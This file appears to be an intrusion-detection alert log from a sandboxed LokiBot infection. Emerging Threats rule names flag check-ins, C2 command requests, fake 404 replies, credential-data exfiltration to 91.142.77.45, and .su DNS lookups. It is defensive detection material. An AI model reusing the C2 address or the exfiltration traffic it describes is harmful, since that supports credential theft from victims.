91.142.77.45192.168.2.680497092025483 11/03/22-12:30:17.656419	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49709	91.142.77.45	192.168.2.6
192.168.2.68.8.8.850343532014169 11/03/22-12:31:05.602892	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	50343	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549717802024318 11/03/22-12:30:35.019960	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49717	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549717802024313 11/03/22-12:30:35.019960	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49717	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.856569532014169 11/03/22-12:31:22.519121	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	56569	53	192.168.2.6	8.8.8.8
91.142.77.45192.168.2.680497122025483 11/03/22-12:30:23.556931	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49712	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549729802021641 11/03/22-12:31:05.707382	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49729	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549742802021641 11/03/22-12:31:41.893270	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49742	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.853943532014169 11/03/22-12:30:54.819244	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	53943	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549730802024318 11/03/22-12:31:07.626823	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49730	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497102025483 11/03/22-12:30:19.791139	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49710	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549735802024313 11/03/22-12:31:27.516452	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49735	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549721802025381 11/03/22-12:30:48.032802	TCP	2025381	ET TROJAN LokiBot Checkin	49721	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.855629532014169 11/03/22-12:31:09.419344	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	55629	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549731802825766 11/03/22-12:31:09.511791	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49731	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549738802025381 11/03/22-12:31:33.019427	TCP	2025381	ET TROJAN LokiBot Checkin	49738	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549712802024313 11/03/22-12:30:22.162497	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49712	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497142025483 11/03/22-12:30:29.899760	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49714	91.142.77.45	192.168.2.6
91.142.77.45192.168.2.680497162025483 11/03/22-12:30:34.572782	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49716	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549706802021641 11/03/22-12:30:09.785093	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49706	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549730802024313 11/03/22-12:31:07.626823	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49730	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.861609532014169 11/03/22-12:30:50.734926	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	61609	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862958532014169 11/03/22-12:31:41.802948	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	62958	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549735802024318 11/03/22-12:31:27.516452	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49735	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.849232532014169 11/03/22-12:31:30.955921	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	49232	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862848532014169 11/03/22-12:31:45.492508	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	62848	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549733802025381 11/03/22-12:31:22.614964	TCP	2025381	ET TROJAN LokiBot Checkin	49733	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549732802021641 11/03/22-12:31:20.467945	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49732	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549720802024318 11/03/22-12:30:45.793165	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49720	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549718802025381 11/03/22-12:30:37.003049	TCP	2025381	ET TROJAN LokiBot Checkin	49718	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549721802825766 11/03/22-12:30:48.032802	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49721	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549720802024313 11/03/22-12:30:45.793165	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49720	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549714802024318 11/03/22-12:30:27.432237	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49714	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549719802024318 11/03/22-12:30:42.564459	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49719	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549725802024313 11/03/22-12:30:57.918358	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49725	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549715802825766 11/03/22-12:30:31.132672	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49715	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549719802024313 11/03/22-12:30:42.564459	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49719	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549710802825766 11/03/22-12:30:18.297577	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49710	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549734802021641 11/03/22-12:31:25.377976	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49734	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.862910532014169 11/03/22-12:30:27.345778	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	62910	53	192.168.2.6	8.8.8.8
91.142.77.45192.168.2.680497352025483 11/03/22-12:31:28.883670	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49735	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549737802021641 11/03/22-12:31:31.046497	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49737	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497422025483 11/03/22-12:31:43.475626	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49742	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549714802024313 11/03/22-12:30:27.432237	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49714	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549711802025381 11/03/22-12:30:20.264286	TCP	2025381	ET TROJAN LokiBot Checkin	49711	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549722802024313 11/03/22-12:30:50.822444	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49722	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.856331532014169 11/03/22-12:30:13.938466	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	56331	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.849448532014169 11/03/22-12:30:17.960732	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	49448	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.850506532014169 11/03/22-12:30:15.990659	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	50506	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.859752532014169 11/03/22-12:31:35.521025	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	59752	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549722802024318 11/03/22-12:30:50.822444	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49722	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549726802021641 11/03/22-12:30:59.657451	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49726	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549741802025381 11/03/22-12:31:39.946873	TCP	2025381	ET TROJAN LokiBot Checkin	49741	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497392025483 11/03/22-12:31:37.318947	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49739	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549709802021641 11/03/22-12:30:16.075566	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49709	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549727802024318 11/03/22-12:31:01.987085	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49727	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549728802825766 11/03/22-12:31:03.903902	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49728	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497312025483 11/03/22-12:31:10.691873	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49731	91.142.77.45	192.168.2.6
192.168.2.68.8.8.865198532014169 11/03/22-12:30:25.312645	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	65198	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549721802021641 11/03/22-12:30:48.032802	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49721	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549715802024318 11/03/22-12:30:31.132672	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49715	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549726802825766 11/03/22-12:30:59.657451	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49726	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549724802024313 11/03/22-12:30:54.913991	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49724	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549710802025381 11/03/22-12:30:18.297577	TCP	2025381	ET TROJAN LokiBot Checkin	49710	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549712802021641 11/03/22-12:30:22.162497	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49712	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549735802825766 11/03/22-12:31:27.516452	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49735	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549744802825766 11/03/22-12:31:45.577786	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49744	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549740802021641 11/03/22-12:31:37.627027	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49740	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549743802024318 11/03/22-12:31:43.782645	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49743	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549743802024313 11/03/22-12:31:43.782645	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49743	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549707802025381 11/03/22-12:30:11.977904	TCP	2025381	ET TROJAN LokiBot Checkin	49707	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549726802025381 11/03/22-12:30:59.657451	TCP	2025381	ET TROJAN LokiBot Checkin	49726	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549725802024318 11/03/22-12:30:57.918358	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49725	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549707802825766 11/03/22-12:30:11.977904	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49707	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497342025483 11/03/22-12:31:27.178865	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49734	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549731802021641 11/03/22-12:31:09.511791	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49731	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.852481532014169 11/03/22-12:30:53.275834	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	52481	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549720802025381 11/03/22-12:30:45.793165	TCP	2025381	ET TROJAN LokiBot Checkin	49720	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.864404532014169 11/03/22-12:31:43.694917	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	64404	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549708802025381 11/03/22-12:30:14.035064	TCP	2025381	ET TROJAN LokiBot Checkin	49708	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549735802021641 11/03/22-12:31:27.516452	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49735	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549706802024317 11/03/22-12:30:09.785093	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49706	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497322025483 11/03/22-12:31:21.820409	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49732	91.142.77.45	192.168.2.6
192.168.2.68.8.8.852865532014169 11/03/22-12:31:37.538077	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	52865	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549725802825766 11/03/22-12:30:57.918358	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49725	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497292025483 11/03/22-12:31:07.339016	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49729	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549724802024318 11/03/22-12:30:54.913991	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49724	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549706802024312 11/03/22-12:30:09.785093	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49706	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497212025483 11/03/22-12:30:50.362964	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49721	91.142.77.45	192.168.2.6
91.142.77.45192.168.2.680497232025483 11/03/22-12:30:54.557575	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49723	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549739802025381 11/03/22-12:31:35.606377	TCP	2025381	ET TROJAN LokiBot Checkin	49739	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.863863532014169 11/03/22-12:30:30.240421	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	63863	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549744802021641 11/03/22-12:31:45.577786	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49744	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549745802025381 11/03/22-12:31:50.569101	TCP	2025381	ET TROJAN LokiBot Checkin	49745	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549736802025381 11/03/22-12:31:29.221112	TCP	2025381	ET TROJAN LokiBot Checkin	49736	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549741802021641 11/03/22-12:31:39.946873	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49741	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549742802025381 11/03/22-12:31:41.893270	TCP	2025381	ET TROJAN LokiBot Checkin	49742	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.862538532014169 11/03/22-12:30:34.919732	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	62538	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.858595532014169 11/03/22-12:30:11.893252	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	58595	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549716802021641 11/03/22-12:30:32.992651	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49716	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549728802024313 11/03/22-12:31:03.903902	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49728	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549725802021641 11/03/22-12:30:57.918358	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49725	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549728802024318 11/03/22-12:31:03.903902	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49728	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.855956532014169 11/03/22-12:31:47.481296	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	55956	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549734802024313 11/03/22-12:31:25.377976	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49734	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549719802021641 11/03/22-12:30:42.564459	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49719	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549723802025381 11/03/22-12:30:53.367985	TCP	2025381	ET TROJAN LokiBot Checkin	49723	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549737802024313 11/03/22-12:31:31.046497	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49737	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549740802024313 11/03/22-12:31:37.627027	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49740	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549717802025381 11/03/22-12:30:35.019960	TCP	2025381	ET TROJAN LokiBot Checkin	49717	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549734802024318 11/03/22-12:31:25.377976	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49734	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497372025483 11/03/22-12:31:32.671321	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49737	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549716802825766 11/03/22-12:30:32.992651	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49716	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549722802825766 11/03/22-12:30:50.822444	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49722	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549722802021641 11/03/22-12:30:50.822444	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49722	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549740802024318 11/03/22-12:31:37.627027	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49740	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497402025483 11/03/22-12:31:39.620076	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49740	91.142.77.45	192.168.2.6
192.168.2.68.8.8.859082532014169 11/03/22-12:30:20.174105	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	59082	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.851530532014169 11/03/22-12:30:41.510499	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	51530	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549709802024313 11/03/22-12:30:16.075566	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49709	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.860032532014169 11/03/22-12:31:29.125849	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	60032	53	192.168.2.6	8.8.8.8
91.142.77.45192.168.2.680497152025483 11/03/22-12:30:32.611167	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49715	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549738802021641 11/03/22-12:31:33.019427	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49738	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549715802024313 11/03/22-12:30:31.132672	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49715	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497262025483 11/03/22-12:31:00.653288	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49726	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549709802024318 11/03/22-12:30:16.075566	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49709	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.858917532014169 11/03/22-12:31:03.812359	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	58917	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549718802024318 11/03/22-12:30:37.003049	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49718	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549721802024313 11/03/22-12:30:48.032802	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49721	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549729802825766 11/03/22-12:31:05.707382	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49729	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549719802025381 11/03/22-12:30:42.564459	TCP	2025381	ET TROJAN LokiBot Checkin	49719	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549721802024318 11/03/22-12:30:48.032802	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49721	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549718802024313 11/03/22-12:30:37.003049	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49718	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549714802825766 11/03/22-12:30:27.432237	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49714	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549736802024313 11/03/22-12:31:29.221112	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49736	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549732802825766 11/03/22-12:31:20.467945	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49732	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549743802021641 11/03/22-12:31:43.782645	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49743	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549740802025381 11/03/22-12:31:37.627027	TCP	2025381	ET TROJAN LokiBot Checkin	49740	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549722802025381 11/03/22-12:30:50.822444	TCP	2025381	ET TROJAN LokiBot Checkin	49722	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549742802825766 11/03/22-12:31:41.893270	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49742	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549731802024318 11/03/22-12:31:09.511791	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49731	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497432025483 11/03/22-12:31:45.271881	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49743	91.142.77.45	192.168.2.6
91.142.77.45192.168.2.680497452025483 11/03/22-12:31:52.163667	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49745	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549731802024313 11/03/22-12:31:09.511791	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49731	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497412025483 11/03/22-12:31:41.587643	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49741	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549714802025381 11/03/22-12:30:27.432237	TCP	2025381	ET TROJAN LokiBot Checkin	49714	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549713802024318 11/03/22-12:30:25.414440	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49713	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549737802025381 11/03/22-12:31:31.046497	TCP	2025381	ET TROJAN LokiBot Checkin	49737	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549709802025381 11/03/22-12:30:16.075566	TCP	2025381	ET TROJAN LokiBot Checkin	49709	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549737802825766 11/03/22-12:31:31.046497	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49737	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549736802024318 11/03/22-12:31:29.221112	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49736	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549732802025381 11/03/22-12:31:20.467945	TCP	2025381	ET TROJAN LokiBot Checkin	49732	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549719802825766 11/03/22-12:30:42.564459	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49719	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.863229532014169 11/03/22-12:30:32.906943	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	63229	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549741802024318 11/03/22-12:31:39.946873	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49741	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549744802024318 11/03/22-12:31:45.577786	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49744	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.849786532014169 11/03/22-12:30:06.615613	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	49786	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549730802025381 11/03/22-12:31:07.626823	TCP	2025381	ET TROJAN LokiBot Checkin	49730	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549744802024313 11/03/22-12:31:45.577786	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49744	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549738802024318 11/03/22-12:31:33.019427	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49738	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549727802025381 11/03/22-12:31:01.987085	TCP	2025381	ET TROJAN LokiBot Checkin	49727	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.856123532014169 11/03/22-12:31:32.930668	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	56123	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549724802025381 11/03/22-12:30:54.913991	TCP	2025381	ET TROJAN LokiBot Checkin	49724	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549741802024313 11/03/22-12:31:39.946873	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49741	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549716802024313 11/03/22-12:30:32.992651	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49716	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549713802021641 11/03/22-12:30:25.414440	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49713	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549723802021641 11/03/22-12:30:53.367985	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49723	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549707802021641 11/03/22-12:30:11.977904	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49707	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549712802825766 11/03/22-12:30:22.162497	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49712	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549711802024318 11/03/22-12:30:20.264286	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49711	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549709802825766 11/03/22-12:30:16.075566	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49709	80	192.168.2.6	91.142.77.45
